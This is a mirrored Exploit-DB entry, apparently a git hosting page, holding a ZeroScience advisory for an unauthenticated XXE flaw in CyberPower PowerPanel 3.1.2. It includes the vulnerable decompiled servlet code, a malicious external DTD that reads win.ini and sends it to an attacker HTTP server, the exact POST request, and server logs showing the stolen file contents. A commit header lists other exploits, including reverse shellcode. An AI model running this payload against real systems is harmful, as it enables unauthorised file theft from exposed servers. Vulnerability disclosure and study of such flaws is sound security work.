bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/xml/webapps/40077.txt
Offensive Security 29f0764fac DB: 2016-07-09 
9 new exploits

Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit

Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)
Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)

Seo Panel 2.2.0 Cookie-Rendered Persistent XSS Vulnerability
Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS Vulnerability

VLC AMV Dangling Pointer Vulnerability
VLC - AMV Dangling Pointer Vulnerability

Movable Type 4.2x_ 4.3x Web Upgrade Remote Code Execution
Movable Type 4.2x_ 4.3x - Web Upgrade Remote Code Execution

Roxio CinePlayer 3.2 SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability
Roxio CinePlayer 3.2 - SonicDVDDashVRNav.DLL ActiveX Control Remote Buffer Overflow Vulnerability

HP Client Automation Command Injection
HP Client - Automation Command Injection

Persistent Systems Client Automation Command Injection RCE
Persistent Systems Client Automation - Command Injection RCE

ElasticSearch Unauthenticated Remote Code Execution
ElasticSearch - Unauthenticated Remote Code Execution

ElasticSearch Search Groovy Sandbox Bypass
ElasticSearch - Search Groovy Sandbox Bypass

Fedora abrt Race Condition Exploit
Fedora - abrt Race Condition Exploit

ProFTPD 1.3.5 Mod_Copy Command Execution
ProFTPD 1.3.5 - Mod_Copy Command Execution

Windows ClientCopyImage Win32k Exploit
Microsoft Windows - ClientCopyImage Win32k Exploit

Wolf CMS Arbitrary File Upload To Command Execution
Wolf CMS - Arbitrary File Upload To Command Execution

Windows Kernel - Bitmap Handling Use-After-Free (MS15-061)
Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)

Kaseya VSA uploader.aspx Arbitrary File Upload
Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload

Samsung Galaxy S6 - Samsung Gallery Bitmap Decoding Crash
Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux 2 (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)
Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)

Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)
Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1)

NETGEAR ProSafe Network Management System 300 Arbitrary File Upload
NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload

Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)
Microsoft  Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

OS X / iOS Suid Binary Logic Error Kernel Code Execution
OS X / iOS - Suid Binary Logic Error Kernel Code Execution

Novell ServiceDesk Authenticated File Upload
Novell ServiceDesk - Authenticated File Upload

Mach Race OS X Local Privilege Escalation Exploit
Mach Race OS X - Local Privilege Escalation Exploit

Oracle ATS Arbitrary File Upload
Oracle Application Testing Suite (ATS) - Arbitrary File Upload

Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)
WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF
Hide.Me VPN Client 1.2.4 - Privilege Escalation
InstantHMI 6.1 - Privilege Escalation
Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC
Microsoft WinDbg logviewer.exe - Crash PoC
Linux x86 TCP Reverse Shellcode - 75 bytes
php Real Estate Script 3 - Arbitrary File Disclosure
CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval
Streamo Online Radio And TV Streaming CMS - SQL Injection
2016-07-09 05:06:22 +00:00

135 lines
No EOL
4.3 KiB
Text
Executable file
Raw Blame History

CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
event logging, hibernation mode, internal reports and analysis,
remote management, and more.
Desc: PowerPanel suffers from an unauthenticated XML External
Entity (XXE) vulnerability using the DTD parameter entities
technique resulting in disclosure and retrieval of arbitrary
data on the affected node via out-of-band (OOB) attack. The
vulnerability is triggered when input passed to the xmlservice
servlet using the ppbe.xml script is not sanitized while parsing the
xml inquiry payload returned by the JAXB element translation.
================================================================
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\
\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\
------------------------
XmlServiceServlet.class:
------------------------
94: private InquirePayload splitInquirePayload(InputStream paramInputStream)
95: throws RequestException
96: {
97: try
98: {
99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry");
100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller();
101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream);
102: return (InquirePayload)localJAXBElement.getValue();
103: }
104: catch (JAXBException localJAXBException)
105: {
106: localJAXBException.printStackTrace();
107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed.");
108: }
109: }
---
C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\
--------
web.xml:
--------
28: <servlet>
29: <servlet-name>xmlService</servlet-name>
30: <servlet-class>com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet</servlet-class>
31: <load-on-startup>3</load-on-startup>
32: </servlet>
..
..
60: <servlet-mapping>
61: <servlet-name>xmlService</servlet-name>
62: <url-pattern>/ppbe.xml</url-pattern>
63: </servlet-mapping>
================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 EN
Microsoft Windows 8
Microsoft Windows Server 2012
Linux (64bit)
MacOS X 10.6
Jetty(7.5.0.v20110901)
Java/1.8.0_91-b14
SimpleHTTP/0.6 Python/2.7.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5338
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php
22.06.2016
--
C:\data\xxe.xml:
----------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.16:8011/?%payload;'> ">
Request:
--------
POST /client/ppbe.xml HTTP/1.1
Host: localhost:3052
Content-Length: 258
User-Agent: XXETester/1.0
Connection: close
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.16:8011/xxe.xml">
%remote;
%root;
%oob;]>
<ppbe>
<target>
<command>action.notification.recipient.present</command>
</target>
<inquire />
</ppbe>
Response:
---------
C:\data>python -m SimpleHTTPServer 8011
Serving HTTP on 0.0.0.0 port 8011 ...
lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 -
lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A/ HTTP/1.1" 200 -
Reference in a new issue View git blame Copy permalink